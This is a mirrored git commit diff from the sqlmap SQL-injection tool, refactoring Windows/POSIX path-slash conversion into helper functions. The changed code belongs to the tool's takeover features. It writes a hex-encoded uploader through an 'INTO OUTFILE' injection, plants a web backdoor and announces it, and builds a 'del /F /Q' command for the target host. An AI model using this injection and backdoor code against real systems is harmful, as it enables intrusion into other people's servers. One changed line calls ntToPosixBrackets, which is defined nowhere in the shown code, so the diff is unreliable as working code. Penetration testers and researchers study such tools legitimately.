mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 02:53:46 +03:00
code refactoring - added functions posixToNtSlashes and ntToPosixSlashes
This commit is contained in:
parent
a1e80e77a1
commit
ec63fc4036
|
@ -236,15 +236,15 @@ def getDocRoot():
|
|||
absFilePathWin = None
|
||||
|
||||
if isWindowsPath(absFilePath):
|
||||
absFilePathWin = absFilePath.replace("/", "\\")
|
||||
absFilePath = absFilePath[2:].replace("\\", "/")
|
||||
absFilePathWin = posixToNtSlashes(absFilePath)
|
||||
absFilePath = ntToPosixSlashes(absFilePath[2:])
|
||||
|
||||
if pagePath in absFilePath:
|
||||
index = absFilePath.index(pagePath)
|
||||
docRoot = absFilePath[:index]
|
||||
|
||||
if absFilePathWin:
|
||||
docRoot = "C:/%s" % docRoot.replace("\\", "/")
|
||||
docRoot = "C:/%s" % ntToPosixSlashes(docRoot)
|
||||
|
||||
docRoot = normalizePath(docRoot)
|
||||
break
|
||||
|
@ -908,3 +908,9 @@ def decloakToMkstemp(filepath, **kwargs):
|
|||
|
||||
def isWindowsPath(filepath):
|
||||
return re.search("\A[A-Za-z]:", filepath) is not None
|
||||
|
||||
def posixToNtSlashes(filepath):
|
||||
return filepath.replace('/', '\\')
|
||||
|
||||
def ntToPosixSlashes(filepath):
|
||||
return filepath.replace('\\', '/')
|
||||
|
|
|
@ -35,6 +35,7 @@ import urlparse
|
|||
from ConfigParser import ConfigParser
|
||||
|
||||
from lib.core.common import getFileType
|
||||
from lib.core.common import ntToPosixSlashes
|
||||
from lib.core.common import parseTargetUrl
|
||||
from lib.core.common import paths
|
||||
from lib.core.common import randomRange
|
||||
|
@ -903,19 +904,19 @@ def __cleanupOptions():
|
|||
conf.delay = float(conf.delay)
|
||||
|
||||
if conf.rFile:
|
||||
conf.rFile = os.path.normpath(conf.rFile.replace("\\", "/"))
|
||||
conf.rFile = os.path.normpath(ntToPosixSlashes(conf.rFile))
|
||||
|
||||
if conf.wFile:
|
||||
conf.wFile = os.path.normpath(conf.wFile.replace("\\", "/"))
|
||||
conf.wFile = os.path.normpath(ntToPosixSlashes(conf.wFile))
|
||||
|
||||
if conf.dFile:
|
||||
conf.dFile = os.path.normpath(conf.dFile.replace("\\", "/"))
|
||||
conf.dFile = os.path.normpath(ntToPosixSlashes(conf.dFile))
|
||||
|
||||
if conf.msfPath:
|
||||
conf.msfPath = os.path.normpath(conf.msfPath.replace("\\", "/"))
|
||||
conf.msfPath = os.path.normpath(ntToPosixSlashes(conf.msfPath))
|
||||
|
||||
if conf.tmpPath:
|
||||
conf.tmpPath = os.path.normpath(conf.tmpPath.replace("\\", "/"))
|
||||
conf.tmpPath = os.path.normpath(ntToPosixSlashes(conf.tmpPath))
|
||||
|
||||
if conf.googleDork or conf.list:
|
||||
conf.multipleTargets = True
|
||||
|
|
|
@ -30,6 +30,7 @@ import zlib
|
|||
|
||||
from lib.core.common import directoryPath
|
||||
from lib.core.common import isWindowsPath
|
||||
from lib.core.common import posixToNtSlashes
|
||||
from lib.core.common import urlEncodeCookieValues
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
|
@ -83,7 +84,7 @@ def parseResponse(page, headers):
|
|||
absFilePath = match.group("result").strip()
|
||||
page = page.replace(absFilePath, "")
|
||||
if isWindowsPath(absFilePath):
|
||||
absFilePath = absFilePath.replace("/", "\\")
|
||||
absFilePath = posixToNtSlashes(absFilePath)
|
||||
if absFilePath not in kb.absFilePaths:
|
||||
kb.absFilePaths.add(absFilePath)
|
||||
|
||||
|
|
|
@ -31,8 +31,10 @@ from lib.core.common import decloakToNamedTemporaryFile
|
|||
from lib.core.common import fileToStr
|
||||
from lib.core.common import getDirs
|
||||
from lib.core.common import getDocRoot
|
||||
from lib.core.common import ntToPosixSlashes
|
||||
from lib.core.common import isWindowsPath
|
||||
from lib.core.common import normalizePath
|
||||
from lib.core.common import posixToNtSlashes
|
||||
from lib.core.common import readInput
|
||||
from lib.core.convert import hexencode
|
||||
from lib.core.data import conf
|
||||
|
@ -90,6 +92,7 @@ class Web:
|
|||
"file": stream,
|
||||
"uploadDir": directory,
|
||||
}
|
||||
|
||||
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
|
||||
|
||||
if "File uploaded" not in page:
|
||||
|
@ -174,7 +177,7 @@ class Web:
|
|||
for directory in directories:
|
||||
# Upload the uploader agent
|
||||
outFile = normalizePath("%s/%s" % (directory, uploaderName))
|
||||
uplQuery = uploaderContent.replace("WRITABLE_DIR", directory)
|
||||
uplQuery = uploaderContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
|
||||
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
|
||||
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
||||
query = agent.prefixQuery(" %s" % query)
|
||||
|
@ -182,13 +185,13 @@ class Web:
|
|||
payload = agent.payload(newValue=query)
|
||||
page = Request.queryPage(payload)
|
||||
|
||||
requestDir = directory.replace('\\', '/').replace(kb.docRoot.replace('\\', '/'), "/").replace("//", "/")
|
||||
requestDir = ntToPosixSlashes(directory).replace(ntToPosixBrackets(kb.docRoot), "/").replace("//", "/")
|
||||
if isWindowsPath(requestDir):
|
||||
requestDir = requestDir[2:]
|
||||
requestDir = normalizePath(requestDir)
|
||||
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
|
||||
self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName)
|
||||
self.webUploaderUrl = self.webUploaderUrl.replace("./", "/").replace("\\", "/")
|
||||
self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/"))
|
||||
uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
|
||||
|
||||
if "sqlmap file uploader" not in uplPage:
|
||||
|
@ -201,18 +204,16 @@ class Web:
|
|||
infoMsg = "the uploader agent has been successfully uploaded "
|
||||
infoMsg += "on '%s'" % directory
|
||||
logger.info(infoMsg)
|
||||
|
||||
|
||||
if kb.os == "Windows":
|
||||
directory = posixToNtSlashes(directory)
|
||||
|
||||
if self.__webFileStreamUpload(backdoorStream, backdoorName, directory):
|
||||
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
|
||||
self.webDirectory = directory
|
||||
|
||||
infoMsg = "the backdoor has probably been successfully "
|
||||
infoMsg += "uploaded on '%s', go with your browser " % directory
|
||||
infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
|
||||
logger.info(infoMsg)
|
||||
else:
|
||||
infoMsg = "the backdoor hasn't been successfully "
|
||||
infoMsg += "uploaded on '%s'" % directory
|
||||
logger.warn(infoMsg)
|
||||
|
||||
break
|
||||
|
|
|
@ -31,6 +31,7 @@ from lib.core.common import formatDBMSfp
|
|||
from lib.core.common import formatFingerprint
|
||||
from lib.core.common import getHtmlErrorFp
|
||||
from lib.core.common import getRange
|
||||
from lib.core.common import posixToNtSlashes
|
||||
from lib.core.common import randomInt
|
||||
from lib.core.common import randomStr
|
||||
from lib.core.convert import urlencode
|
||||
|
@ -496,9 +497,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeov
|
|||
logger.debug(debugMsg)
|
||||
|
||||
debugSize = 0xFF00
|
||||
tmpPath = conf.tmpPath.replace("/", "\\")
|
||||
tmpPath = posixToNtSlashes(conf.tmpPath)
|
||||
dFileName = os.path.split(dFile)[1]
|
||||
dFile = dFile.replace("/", "\\")
|
||||
dFile = posixToNtSlashes(dFile)
|
||||
wFileSize = os.path.getsize(wFile)
|
||||
wFilePointer = open(wFile, "rb")
|
||||
wFileContent = wFilePointer.read()
|
||||
|
|
|
@ -29,6 +29,7 @@ from lib.core.agent import agent
|
|||
from lib.core.common import formatDBMSfp
|
||||
from lib.core.common import formatFingerprint
|
||||
from lib.core.common import getHtmlErrorFp
|
||||
from lib.core.common import ntToPosixSlashes
|
||||
from lib.core.common import randomInt
|
||||
from lib.core.common import randomStr
|
||||
from lib.core.data import conf
|
||||
|
@ -496,7 +497,7 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
|||
|
||||
# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir
|
||||
self.__basedir = inject.getValue("SELECT @@basedir")
|
||||
self.__basedir = os.path.normpath(self.__basedir.replace("\\", "/"))
|
||||
self.__basedir = os.path.normpath(ntToPosixSlashes(self.__basedir))
|
||||
|
||||
if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I):
|
||||
kb.os = "Windows"
|
||||
|
@ -517,7 +518,7 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
|||
# NOTE: specifying the relative path as './udf.dll'
|
||||
# saves in @@datadir on both MySQL 4.1 and MySQL 5.0
|
||||
self.__datadir = "."
|
||||
self.__datadir = os.path.normpath(self.__datadir.replace("\\", "/"))
|
||||
self.__datadir = os.path.normpath(ntToPosixSlashes(self.__datadir))
|
||||
|
||||
if re.search("[\w]\:\/", self.__datadir, re.I):
|
||||
kb.os = "Windows"
|
||||
|
|
|
@ -25,6 +25,8 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|||
import os
|
||||
import re
|
||||
|
||||
from lib.core.common import ntToPosixSlashes
|
||||
from lib.core.common import posixToNtSlashes
|
||||
from lib.core.common import readInput
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
|
@ -65,7 +67,7 @@ class Miscellaneous:
|
|||
if re.search("^[\w]\:[\/\\\\]+", conf.tmpPath, re.I):
|
||||
kb.os = "Windows"
|
||||
|
||||
conf.tmpPath = conf.tmpPath.replace("\\", "/")
|
||||
conf.tmpPath = ntToPosixSlashes(conf.tmpPath)
|
||||
conf.tmpPath = os.path.normpath(conf.tmpPath)
|
||||
|
||||
setRemoteTempPath()
|
||||
|
@ -77,7 +79,7 @@ class Miscellaneous:
|
|||
if doubleslash:
|
||||
tempFile = tempFile.replace("/", "\\\\")
|
||||
else:
|
||||
tempFile = tempFile.replace("/", "\\")
|
||||
tempFile = posixToNtSlashes(tempFile)
|
||||
|
||||
cmd = "del /F /Q %s" % tempFile
|
||||
else:
|
||||
|
|
Loading…
Reference in New Issue
Block a user